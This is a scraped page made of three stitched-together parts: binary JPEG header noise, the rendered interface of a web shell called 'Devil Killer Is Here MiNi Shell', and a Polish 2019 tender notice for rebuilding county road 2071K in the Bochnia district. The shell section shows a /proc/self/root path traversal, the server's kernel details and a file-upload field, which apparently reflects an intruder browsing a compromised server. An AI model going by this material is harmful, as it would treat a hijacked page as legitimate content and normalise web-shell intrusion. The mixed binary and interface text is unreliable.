JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20190417/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20190417/539150-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 539150-N-2019 z dnia 2019-04-17 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Powiatowy Zarząd Dróg w Bochni z siedzibą w Nowym Wiśniczu</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">"Rozbudowa drogi powiatowej nr 2071K Łąkta Górna-Łapanów w km 2+037-2+093 w m. Łąkta Górna, w km 3+691-4+042 w m. Łąkta Dolna i Kierlikówka, w km 10+093-10+283 w m. Tarnawa wraz z rozbudową skrzyżowania z drogą powiatową nr 1619K"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Powiatowy Zarząd Dróg w Bochni z siedzibą w Nowym Wiśniczu</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">85166525500000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Limanowska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">11</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">32-720</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Nowy Wiśnicz</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">14 6128206</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">sekretariat@pzd.bochnia.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">14 6108481</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url"></span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Jednostki organizacyjne administracji samorządowej</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.pzd.bochnia.pl </span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">w wersji papierowej na adres siedziby Zamawiającego </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul. Limanowska 11, 32-720 Nowy Wiśnicz </span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">"Rozbudowa drogi powiatowej nr 2071K Łąkta Górna-Łapanów w km 2+037-2+093 w m. Łąkta Górna, w km 3+691-4+042 w m. Łąkta Dolna i Kierlikówka, w km 10+093-10+283 w m. Tarnawa wraz z rozbudową skrzyżowania z drogą powiatową nr 1619K"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZDP.ZP.271.7.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiot zamówienia stanowi: "Rozbudowa drogi powiatowej nr 2071K Łąkta Górna-Łapanów w km 2+037-2+093 w m. Łąkta Górna, w km 3+691-4+042 w m. Łąkta Dolna i Kierlikówka, w km 10+093-10+283 w m. Tarnawa wraz z rozbudową skrzyżowania z drogą powiatową nr 1619K"3.2.1. Zamawiający zleca, a Wykonawca zobowiązuje się do kompleksowej realizacji inwestycji pod nazwą: "Rozbudowa drogi powiatowej nr 2071K Łąkta Górna-Łapanów w km 2+037-2+093 w m. Łąkta Górna, w km 3+691-4+042 w m. Łąkta Dolna i Kierlikówka, w km 10+093-10+283 w m. Tarnawa wraz z rozbudową skrzyżowania z drogą powiatową nr 1619K"3.2.2. Zadanie realizowane jest z udziałem środków Funduszu Dróg Samorządowych. o	Wykonawca zobowiązany jest do wykonania i zamontowania tablicy informacyjnej informującej użytkowników drogi o realizacji zadania z udziałem środków Funduszu Dróg Samorządowych. 3.2.3 Zadanie obejmuje trzy zadania opisanych dokumentacją projektową: Zadanie 1 - realizowane zgodnie z decyzją pozwolenia na budowę nr 398/2017 z dnia 16.06.2017 Przedmiot zadania obejmuje: ,,Przebudowę i rozbudowę przepustu w ciągu drogi powiatowej nr 2071K Łąkta Górna- Łapanów w miejscowości Łąkta Górna w km 2+062 wraz z rozbudową i przebudową drogi w km 2+037 - 2+093, budową chodnika w km 2+042 - 2+088, kanalizacji deszczowej w km 2+031 - 2+093, umocnieniem skarp oraz wylotu w km 2+037 - 2+093 a także wykonaniem konstrukcji oporowej w km 2+046 - 2+078 w celu zabezpieczenia drogi powiatowej w ramach zadania pn. ,,Przebudowa i rozbudowa przepustu w ciągu drogi powiatowej nr 2071K Łąkta Górna-Łapanów w miejscowości Łąkta Górna w km 2+062". Pierwszy odcinek dotyczy rozbudowy drogi powiatowej nr 2071K Łąkta Górna - Łapanów, w km. 2+037 - 2+093,w miejscowości Łąkta Górna, w Gminie Żegocina. Planowanym zadaniem jest wykonanie przebudowy i rozbudowy przepustu w ciągu drogi powiatowej nr 2071K Łąkta Górna - Łapanów w miejscowości Łąkta Górna w km 2+062 wraz z rozbudową i przebudową drogi w km 2+037 - 2+093, budową chodnika w km 2+042 - 2+088, kanalizacji deszczowej w km 2+031 - 2+093, umocnieniem skarp oraz wylotu w km 2+037 - 2+093 a także wykonaniem konstrukcji oporowej w km 2+046 - 2+078 w celu zabezpieczenia drogi powiatowej w ramach zadania pn. ,,Przebudowa i rozbudowa przepustu w ciągu drogi powiatowej nr 2071K Łąkta Górna-Łapanów w miejscowości Łąkta Górna w km 2+062". Stan istniejący:Teren w okolicach przedmiotowej inwestycji jest wyraźnie pofałdowany ze stromym spadkiem w kierunku północnym. Rzędne okolicznego terenu wahają się w granicach 343 - 358 m n. p. m.Na odcinku planowanej inwestycji droga powiatowa posiada przekrój drogowy z jednostronnym rowem odwadniającym. Nawierzchnia jezdni z betonu asfaltowego (w złym stanie technicznym) posiada nieregularną szerokość podstawową wahającą się w granicach ok. 4,80 - 5,20 m, ze zwężeniem przy istniejącym przepuście do szerokości minimalnej ok. 3,70 m. Ponadto w obrębie inwestycji zlokalizowana jest stalowa bariera drogowa od strony stromej skarpy terenu. Przedmiotowy przepust o konstrukcji betonowej posiada długość 7,00 m, średnicę ?1200 i jest w bardzo złym stanie technicznym - posiada liczne spękania i zarysowania oraz widoczną degradację powierzchni betonowej.Na terenie planowanej inwestycji występują zagrożenia związane z ruchem drogowym, które mogą powodować utratę zdrowia i życia ludzkiego. Jednym z głównych niebezpieczeństw występujących na danym terenie jest zawężenie pasa jezdni w rejonie przepustu, spowodowane występowaniem zjawisk osuwiskowych, podmywaniem konstrukcji przez wody opadowe i obrywaniem krawędzi drogi. Ponadto liczne ubytki i nieregularny profil drogi, zarówno podłużny jak i poprzeczny, stwarzają utrudnienia dla poruszających się pojazdów i pieszych oraz stwarzają złe warunki odwodnieniowe drogi (brak odpowiedniego odprowadzenia wody opadowej i liczne zastoiska wody).Odwodnienie drogi odbywa się poprzez spadki podłużne i poprzeczne do istniejącego rowu odwadniającego oraz na pobliskie tereny.Niniejsze zadanie ma na celu dokonanie niezbędnych napraw związanych z udrożnieniem przepustu, zabezpieczeniem skarpy drogi oraz poprawą warunków bezpieczeństwa ruchu w rejonie przepustu poprzez zmianę geometrii i konstrukcji drogi.W sąsiedztwie inwestycji występują głównie niska zabudowa mieszkaniowa i gospodarcza, pola uprawne, tereny zadrzewione i zakrzewione oraz tereny niezagospodarowaneStan projektowy:Głównym zadaniem inwestycji jest poprawa bezpieczeństwa i komfortu uczestników ruchu drogowego poprzez przebudowę przepustu, likwidację zawężenia jezdni, zabezpieczanie i umocnienie stromej skarpy terenu oraz budowę chodnika wraz z kanalizacją deszczową.Zakres robót dotyczy:o konstrukcyjnego zabezpieczenia drogi polegającego na wykonaniu konstrukcji oporowej po prawej stronie drogi powiatowej na odcinku 31,50 m tj. od km 2+046.80 do km 2+078.30 składającej się z pali wierconych pionowych o średnicy 500mm, długości 15,00 m z mikropalami kotwiącymi o średnicy 200 mm, długości 15,00 m zwieńczone oczepem żelbetowym 60x80 cm, o odbudowy skarpy poprzez usunięcie gruntów koluwialnych i słabych ze skarpy, wykonanie nasypu z gruntu przepuszczalnego 0/31,5 mm oraz zabezpieczenia powierzchniowego z narzutu kamiennego na podbudowie betonowej.o odbudowy drogi na o długości 56 m, w km 2+037 - 2+093 wraz z 46 metrowym chodnikiem po południowej-lewej stronie drogi. Parametry projektowe:o Droga powiatowa,o Klasa drogi: Z,o Kategoria ruchu: KR3,o Prędkość projektowa: 40 km/h,o Szerokość podstawowa pasa ruchu: 3,00 m,o Szerokość podstawowa jezdni: 6,00 m,o Szerokość chodnika: 2,00 m,o Szerokość pobocza: 1,00 m/1,60 m (przy barierze ochronnej).W miejscu zniszczonego przepustu zaprojektowano przepust o średnicy 80 cm z rur PEHD. Całkowita długość przepustu wynosi 12,60 m (7,00 m - przewód pod drogą, 5,60 m - przewód za studnią wpadową nr 4). Przepusty będą układane ze spadkiem 2%. Przy wlocie oraz wylocie przepustu zlokalizowanego pod drogą zostaną wykonane studnie wpadowe. Natomiast na wylocie z przepustu, za studnią wpadową zastosowano nieckę wypadową żelbetową z upustem. Odwodnienie będzie odbywało się poprzez spływ powierzchniowy wód opadowych. Zaprojektowane spadki podłużne i poprzeczne zapewniają sprawne odprowadzenie wody do projektowanych wpustów kanalizacji deszczowej poprzez ściek z obniżonych dwóch rzędów betonowej kostki brukowej. Łącznie w zakresie odcinka nr I planuje się:o budowę chodnika o długości 46 m, strona lewa,o przebudować jezdnię drogi na długości 56 m,o wyposażyć jezdnię w ulepszone pobocza o szerokości 1 m o łącznej długości 66 m; strona lewa 10 m, strona prawa 56 m. Szczegółowy opis zadania 1 stanowi dokumentacja projektowa stanowiąca załącznik D do SIWZ. Zadania 2 - zgodnie z decyzją nr 2/2017 o zezwoleniu na realizację inwestycji drogowejPrzedmiotem zadania jest: ,,Rozbudowa drogi powiatowej 2071K klasy ,,Z" w km 3+ 063 - 4+042,66 w miejscowościach Łąkta Górna i Kierlikówka wraz z przebudową infrastruktury technicznej: sieci gazowej, budową sieci drenażowej, kanalizacji deszczowej oraz przebudową skrzyżowania"Stan istniejący:Przedmiotowa droga powiatowa nr 2071K przebiega przez miejscowości Łąkta Dolna, Kierlikówka i znajduje się na terenie zabudowanym, charakteryzującym się zabudową niską, mieszkalną, zagrodową. Jezdnia wykonana jest z nawierzchni asfaltowej i posiada szerokość ok. 5.50m. Jezdnia ograniczona jest poboczami gruntowymi oraz nawierzchnią z betonu i kostki betonowej w obrębie istniejących zjazdów. Na całej swojej długości droga nie posiada chodników, przystanki autobusowe nie są wyposażone w perony. Odwodnienie realizowane jest poprzez spadki podłużne i poprzeczne jezdni. Woda odprowadzana jest do istniejących rowów przydrożnych. Między km 3+775 a km 3+864 w układzie drogi znajdują się dwa ostre zakręty, które negatywnie wpływają na bezpieczeństwo ruchu drogowego. Stan docelowy:Dla rozbudowywanego odcinka drogi przyjęto parametry techniczne jak niżej:klasa techniczna drogi - Z kategoria ruchu - KR3obciążenie nawierzchni - 100kN/ośprędkość projektowa - 40 km/hszerokość jezdni - 6.00 mpochylenie poprzeczne jezdni - 2.00%szerokość chodnika - 2.28-2.50mpochylenie poprzeczne chodnika - 2.00%szerokość peronu - 2.00mszerokość poboczy - 1.00mRozbudowa drogi powiatowej ma na celu poprawienie bezpieczeństwa oraz warunków ruchu poprzez rozbudowę jezdni, przebudowę pobocza gruntowego, przebudowę zjazdów, budowę systemu odwodnienia drogowego, budowę chodnika. Rozbudowę drogi od km 3+691.63 do km 4+042.66 polegać będzie na poprowadzeniu drogi nowym śladem w celu likwidacji ostrych zakrętów w km 3+775 - 3+864, wykonaniu nowych warstw konstrukcyjnych drogi. Jezdnia o szerokości 6.00 m posiadać będzie nawierzchnię z betonu asfaltowego. Zostanie ograniczona ściekiem przykrawężnikowym z kostki betonowej oraz poboczem gruntowym utwardzonym destruktem asfaltowym o szerokości 1,00m wzdłuż lewej krawędzi jezdni. Wzdłuż prawej krawędzi ściekiem przykrawężnikowym z kostki betonowej. Na łukach zaprojektowano poszerzenia jezdni do szerokości 6.30m. Zmiana szerokości jezdni realizowana jest poprzez proste przejściowe o dł. 25.00m. Wzdłuż lewej krawędzi jezdni zaprojektowano chodnik od km 3+691.63 do km 4+042.66, wzdłuż prawej krawędzi jezdni zaprojektowano chodnik od km 3+942.67 do km 3+971.87. Chodnik o szerokości od 2.28 do 2,50m i spadku poprzecznym równym 2% posiadać będzie nawierzchnię z kostki betonowej. Po prawej stronie ograniczony będzie i krawężnikiem betonowym natomiast od strony lewej obrzeżem betonowym. Za chodnikiem przewidziano opaskę gruntową szerokości 0.50m. Pobocza drogi zaprojektowano z destruktu asfaltowego skropionego emulsją o szerokości 1.00 m i spadku poprzecznym od 6% do 8%.W ramach tej inwestycji zaplanowano: o 1 peron przystankowy od km 3+695.06 do km 3+704,13strona prawa, nawierzchnia o szerokości 2.00m i spadku poprzecznym równym 2% w kierunku jezdni, zostanie wykonana z kostki betonowej,o budowę kanalizacji deszczowej na drodze powiatowej nr 2071K. Wody opadowe z przebudowywanej drogi oraz terenów przyległych zostaną ujęte w zamknięty system kanalizacji deszczowej ze studzienkami ściekowymi częściowo zlokalizowanymi w jezdni. Wszystkie projektowane kanały deszczowe odprowadzać będą wody opadowe w systemie grawitacyjnym zgodnie z kierunkiem spływu do projektowanej kanalizacji deszczowej.o budowę wyniesionej tarczy przejścia dla pieszych od km 3+942.67 do km 3+949.87. Posiadać ona będzie nawierzchnię z kostki betonowej wibroprasowanej o spadku poprzecznym równym 2%.o budowę 2 zatok postojowych od km 3+905.18 do km 3+931.70 wzdłuż lewej krawędzi jezdni oraz od km 3+949.87 do km 3+981.81 wzdłuż prawej krawędzi jezdni.Łącznie w zakresie odcinka nr II planuje się:o budowę chodników o łącznej długości 388 m; strona lewa 358 m, strona prawa 30 m,o przebudowę jezdni drogi na długości 351 m, o wybudować 1 perony przystankowy, 2 zatoki postojowe autobusowe z peronami,o wybudować 1 wyniesione przejście dla pieszych z oznakowaniem aktywnym,o wyposażyć jezdnię w ulepszone pobocza o szerokości 1 m o łącznej długości 323 m,o przebudować 1 skrzyżowanie drogi 